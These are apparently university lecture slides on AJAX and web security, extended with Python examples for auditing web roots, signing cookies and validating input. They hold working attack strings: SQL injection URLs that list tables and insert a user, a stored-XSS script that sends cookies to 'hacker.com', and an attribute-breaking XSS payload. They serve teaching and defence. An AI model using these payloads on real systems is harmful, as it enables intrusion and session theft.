CSE 136 - Lecture 8
   AJAX
   Presentation Layer Security
   Lab
AJAX - what & why?
   Asynchronous JavaScript and XML
   Why? Improve performance
     Avoid a full postback: saves the page re-load time
     Transfer a smaller amount of data across the network
   Example: dependent drop-downs for year, make, model (each selection fetches only the next list)
AJAX - flow
Ajax - postback vs callback
Ajax - ASP.NET Ajax Architecture
Web Attack - Resource Enumeration
   Guess the names of files and directories the developers left behind and request each one; a 200 instead of a 404 confirms it exists
   Common Files
       test.txt
       back.zip
       upload.zip
       passwords.txt
       users.txt
       checkout.aspx.bak
       checkout.asp.old
       (a .bak/.old copy of a server page is served as plain text, so it leaks the source and any connection strings in it)
   Common Directories
       /admin
       /reports
       /test
       /upload
       /temp
       /include
       /logs
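Both sides of the slide above, as an added example that is not part of the lecture: an attacker derives backup names from a page the site already links to, and a defender walks the deployed web root to find the same leftovers first. The suffix and extension lists, the helper names and the sample deployment (built in a temporary directory) are assumptions for this example.

```python
import os
import tempfile

# Names attackers try first (the slide's lists) and the suffixes that turn a
# server-side page into a plain-text download of its source.
SENSITIVE_FILES = {"test.txt", "back.zip", "upload.zip", "passwords.txt", "users.txt"}
SENSITIVE_DIRS = {"admin", "reports", "test", "upload", "temp", "include", "logs"}
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".zip", "~")      # assumption: slightly wider than the slide
SERVER_PAGE_EXTS = (".aspx", ".asp", ".ashx", ".asmx", ".config", ".cs")


def backup_candidates(url_path):
    """Attacker's view: from one page the site already links to, derive the
    backup and legacy names worth requesting (a 200 instead of 404 confirms one)."""
    base, ext = os.path.splitext(url_path)
    candidates = [url_path + s for s in (".bak", ".old", ".orig", "~", ".txt")]
    candidates += [base + s for s in (".zip", ".bak", ".old")]
    if ext.lower() == ".aspx":                 # classic-ASP ancestors often survive a migration
        candidates += [base + ".asp", base + ".asp.old"]
    return candidates


def audit_webroot(root):
    """Defender's view: walk the deployed web root and report everything the
    enumeration lists above would find. Returns sorted (kind, relative path) tuples."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for d in dirnames:
            if d.lower() in SENSITIVE_DIRS:
                findings.append(("directory", _rel(rel_dir, d)))
        for f in filenames:
            low = f.lower()
            if low in SENSITIVE_FILES:
                findings.append(("sensitive-file", _rel(rel_dir, f)))
                continue
            for suffix in BACKUP_SUFFIXES:
                if low.endswith(suffix):
                    stem = low[: -len(suffix)]
                    kind = "source-backup" if stem.endswith(SERVER_PAGE_EXTS) else "backup"
                    findings.append((kind, _rel(rel_dir, f)))
                    break
    return sorted(findings)


def _rel(rel_dir, name):
    return os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")


def build_sample_webroot():
    """Constructed sample deployment (not a real site) in a temporary directory."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "index.aspx": "<%@ Page %>",
        "checkout.aspx": "<%@ Page %>",
        "checkout.aspx.bak": "<%@ Page %> ... connection string ...",
        "passwords.txt": "alice:hunter2",
        "admin/login.aspx": "<%@ Page %>",
        "data/back.zip": "PK",
        "images/logo.png": "PNG",
    }
    for rel, content in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for kind, path in audit_webroot(build_sample_webroot()):
        print(f"{kind:15} {path}")
    print(backup_candidates("/checkout.aspx"))
```

Run the audit against the real web root as part of deployment; anything it reports is reachable by the same guessing an attacker does, and the fix is to delete the file, not to hide it behind an obscure name.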
Web Attack - Parameter manipulation
   /student/details/1000  change to 1001? (if the server only looks up the ID and never checks that the caller may see that record, any user can read any student's details)
   SQL Injection
       query = "select product_name from product where product_id=" + PID
   PID comes from the web parameter and is pasted into the query as SQL, not as a value:
     http://myweb.com/product.aspx?PID=1
     http://myweb.com/product.aspx?PID=1 union select name from sysobjects where xtype='U'
      (lists every user table; sysobjects is the SQL Server catalog)
   The attacker adds himself to the Users table (a stacked query; SQL Server runs several statements per request):
       http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
Web Attack – cross site scripting (XSS)
   Once you compromise the database (or find any input that is stored and re-displayed without encoding), insert JavaScript into the tables
     product.description = "<script>document.location='http://hacker.com/collector.html?cookie='+document.cookie</script>"
     The browser of every user who views that product runs the script, and the hacker now knows their cookie when the content is rendered.
   Danger of cross site scripting
     Contents of the current document cookie are sent off to hacker.com (a cookie flagged HttpOnly is not readable from document.cookie, which blocks this particular theft but not anything else the script does in the user's session)
     Session IDs and authentication tokens are commonly stored in cookies
     JavaScript can log key strokes
Web Attack - Prevention
   Remove all SQL injection: never build queries by string concatenation; use parameterized queries (SqlParameter) or stored procedures with parameters
   HTML-encode all data displayed to prevent XSS (Server.HtmlEncode / HttpUtility.HtmlEncode, applied at output time for the context the data lands in)
   Treat any input as a potential threat
       user can enter JavaScript in a textbox and textarea
       Use validation on the server (the user can disable JavaScript error checking in the browser, or send the request without a browser at all)
   Do not trust values the client can edit: sign or encrypt cookies, or use an opaque session ID
       user_id="100" // No: anyone can change it to 101
       user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS-JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD" // opaque and integrity-protected (what the ASP.NET Forms Authentication ticket does)
   Upload Files:
       Email attachment
       Business documents
       Servers should run a virus checker on all uploaded files (and check the type, store them outside the web root under a server-chosen name, so an uploaded .aspx is never executed)
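The cookie point above, and the "validate the user through cookies/sessions on the web service" advice later in the deck, as an added example that is not part of the lecture: a tamper-evident cookie (HMAC over the user id and issue time) next to the alternative of an opaque random session token that is only a key into server-side state. The key, the timestamps and the field layout are assumptions for this example; the forging function shows what the plain `user_id="100"` design invites.

```python
import base64
import binascii
import hashlib
import hmac
import secrets


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_cookie(user_id, key, issued):
    """Tamper-evident cookie: user id and issue time, plus an HMAC over both.
    The content is still readable by the client; encrypt as well if it must be secret."""
    payload = f"{user_id}|{issued}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(tag)


def verify_cookie(cookie, key, now, max_age=8 * 3600):
    """Return the user id the cookie was issued for, or None if the tag does not
    match (edited, forged, or signed with another key) or it is older than max_age."""
    try:
        p64, t64 = cookie.split(".", 1)
        payload, tag = _unb64(p64), _unb64(t64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):      # constant-time comparison
        return None
    # Only now is the payload known to be ours, so parsing it is safe.
    user_id, issued = (int(part) for part in payload.decode().split("|", 1))
    if now - issued > max_age:
        return None
    return user_id


def forge_by_editing(cookie, new_user_id):
    """What the slide's user_id="100" cookie invites: rewrite the id, keep the tag."""
    p64, t64 = cookie.split(".", 1)
    _, issued = _unb64(p64).decode().split("|", 1)
    return _b64(f"{new_user_id}|{issued}".encode()) + "." + t64


class SessionStore:
    """Alternative that puts nothing meaningful in the cookie: a random token that
    is only a key into server-side state (the model ASP.NET session state uses)."""

    def __init__(self):
        self._sessions = {}

    def create(self, user_id):
        token = secrets.token_urlsafe(32)       # 256 random bits: not guessable, not decodable
        self._sessions[token] = user_id
        return token

    def user_for(self, token):
        return self._sessions.get(token)

    def revoke(self, token):                     # logout takes effect immediately, unlike a signed cookie
        self._sessions.pop(token, None)


if __name__ == "__main__":
    key = secrets.token_bytes(32)                # assumption: a per-deployment secret kept on the server
    cookie = sign_cookie(100, key, issued=1_700_000_000)
    print(cookie)
    print(verify_cookie(cookie, key, now=1_700_000_600))                      # 100
    print(verify_cookie(forge_by_editing(cookie, 101), key, now=1_700_000_600))  # None
```

Whichever design is used, the Ajax web service must run the same check as the pages: a method that accepts a `user_id` argument from the client instead of taking it from the verified cookie or session has the `user_id="100"` problem all over again.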
Web Attack and AJAX
   The methods of a Web service are analogous to the form inputs of a Web application: each one is an entry point that accepts attacker-controlled parameters
   They are easy to find, easy to attack
   WSDL is now open to the public (example data often provided), so the attacker gets the full method list and parameter types without guessing
Web Attack - Traditional vs AJAX
Web Attack - white vs. black
   [figure] Exposed BL domain model
Web Attack - Ajax security mistakes
   [figure]
   Solution: the web service the Ajax code calls must authenticate the caller with the same session cookie as the web pages, instead of accepting anonymous calls
Web Attack - Securing Ajax server
   Install a validation filter that runs on every request before the handler
   Use regular expressions to validate input strings (allow-list: describe what valid input looks like and reject everything else)
   Use regular expressions to remove "attack" characters: < & / >, etc. (a weak second line only: stripping characters misses attribute-context payloads, so output encoding is still required)
   Validate the user through cookies/sessions on the web service (the Ajax endpoint is just another page: it must check authentication and authorization on every call)
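The validation filter, the allow-list regular expressions and the "remove attack characters" idea from the slide above, together with the HTML-encoding defence from the XSS and Prevention slides, as an added example that is not part of the lecture. The field rules in `SCHEMA`, the rendering functions and the two payloads are constructed for the example; the second payload is chosen to contain none of the characters the strip list removes.

```python
import html
import re

# Allow-list patterns: say what valid input looks like, reject everything else.
# (Assumed field rules for this example; a real app derives them from its model.)
SCHEMA = {
    "pid": re.compile(r"[0-9]{1,9}"),
    "uname": re.compile(r"[A-Za-z0-9_.-]{3,32}"),
}


def validate_request(params, schema=SCHEMA):
    """The 'validation filter': run over every request before the handler.
    Returns a list of problems; an empty list means the request may proceed."""
    problems = []
    for name, value in params.items():
        pattern = schema.get(name)
        if pattern is None:
            problems.append(f"unexpected parameter {name!r}")   # unknown fields are rejected too
        elif not pattern.fullmatch(value):
            problems.append(f"invalid {name!r}")
    return problems


def strip_attack_chars(text):
    """The slide's 'remove attack characters' approach, kept for comparison."""
    return re.sub(r"[<>&/]", "", text)


# Output encoding: the same value rendered in element content and inside an attribute.
def render_description_raw(desc):
    return f"<p>{desc}</p>"


def render_description_encoded(desc):
    return f"<p>{html.escape(desc, quote=True)}</p>"


def render_name_stripped(name):
    return f'<input name="uname" value="{strip_attack_chars(name)}">'


def render_name_encoded(name):
    return f'<input name="uname" value="{html.escape(name, quote=True)}">'


# Constructed payloads: the slide's stored-XSS script, and an attribute-context
# payload that uses only a double quote to escape the value and add an event handler.
SCRIPT_PAYLOAD = ("<script>document.location='http://hacker.com/collector.html?cookie='"
                  "+document.cookie</script>")
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


if __name__ == "__main__":
    print(validate_request({"pid": "1 union select name from sysobjects where xtype='U'"}))
    print(render_description_encoded(SCRIPT_PAYLOAD))
    print(render_name_stripped(ATTR_PAYLOAD))     # the handler survives the strip list
    print(render_name_encoded(ATTR_PAYLOAD))      # the quote is encoded, the value stays a value
```

Validation on the way in and encoding on the way out are separate controls: the filter rejects input that has no business containing markup, and the encoder makes whatever is stored harmless in the context where it is rendered. Dropping characters instead of encoding them changes the data and still leaves contexts, such as the attribute above, where the payload never needed those characters.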
Review questions
   Is Ajax synchronous or asynchronous?
   Why use Ajax?
   Is an Ajax architecture more secure or less?
   What is XSS?
   What is the difference between white box and black box?
Your assignment
   Complete your MVC project with test cases
   Project due next Thursday
Lab
   Due: Grade your middle tier and test cases
References
   Dino Esposito and Andrea Saltarello, Microsoft .NET: Architecting Applications for the Enterprise (Microsoft Press)
   Billy Hoffman and Bryan Sullivan, Ajax Security (Addison-Wesley)
